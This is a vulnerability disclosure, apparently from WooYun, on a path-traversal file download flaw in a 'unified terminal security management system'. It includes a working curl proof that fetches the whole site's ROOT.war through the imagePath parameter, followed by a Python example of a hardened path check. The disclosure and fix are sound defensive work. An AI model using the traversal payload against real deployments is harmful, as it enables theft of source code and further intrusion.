Software Terminal Security Management System File Download Vulnerability (one-click download of the entire website)
As the title says.
Following on from this earlier report: http://**.**/bugs/wooyun-2015-0159690
Searching directly for the product keywords from that report (chinansoft unified terminal security management system) and reviewing the source code, the arbitrary file download vulnerability is obvious. The affected endpoint is:
/Picture?imagePath=
Proof of vulnerability:
curl **.**.**.**:8080/Picture?imagePath=../server/default/deploy/ROOT.war > root.rar
The resulting root.rar contains the code of the entire website.
Attached several cases:
Solution:
Filter the imagePath parameter so that it cannot traverse outside the directory the endpoint is meant to serve images from.
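To make the fix concrete, here is an added example (not the vendor's code; the product itself is a Java web application, this is written in Python to illustrate the check) that canonicalises the imagePath value and rejects anything that resolves outside an assumed image directory, including the ../server/default/deploy/ROOT.war payload from the proof above:

```python
from pathlib import Path

# Assumed (constructed) directory that the /Picture endpoint is meant to serve from.
IMAGE_DIR = Path("/srv/app/images")


def unsafe_join(image_dir: Path, user_value: str) -> Path:
    """The vulnerable pattern: concatenate the parameter onto the base directory
    and serve whatever it points at. '../' walks straight out of image_dir."""
    return image_dir / user_value


def resolve_image_path(image_dir: Path, user_value: str) -> Path:
    """Map the untrusted imagePath parameter onto a file inside image_dir.

    Raises ValueError for empty values, null bytes, absolute paths and any
    value that canonicalises to a location outside image_dir.
    """
    if not user_value or "\x00" in user_value:
        raise ValueError("invalid imagePath")
    if Path(user_value).is_absolute():
        raise ValueError("absolute paths are not allowed")
    base = image_dir.resolve()
    # resolve() collapses '..' components lexically even when the target file
    # does not exist, so the containment check below cannot be tricked by
    # traversal sequences hidden inside the user-supplied value.
    candidate = (base / user_value).resolve()
    if candidate == base:
        raise ValueError("imagePath must name a file, not the directory")
    if base not in candidate.parents:
        raise ValueError(f"imagePath escapes image directory: {user_value!r}")
    return candidate


def is_allowed(image_dir: Path, user_value: str) -> bool:
    """Convenience wrapper: True if the value maps to a file inside image_dir."""
    try:
        resolve_image_path(image_dir, user_value)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    payload = "../server/default/deploy/ROOT.war"
    print("unsafe join serves:", unsafe_join(IMAGE_DIR, payload))
    print("hardened check allows payload:", is_allowed(IMAGE_DIR, payload))
    print("hardened check allows logo.png:", is_allowed(IMAGE_DIR, "logo.png"))
```

The same containment check (resolve the candidate, then verify the base directory is one of its parents) is what a servlet filter on this endpoint should do before opening any file.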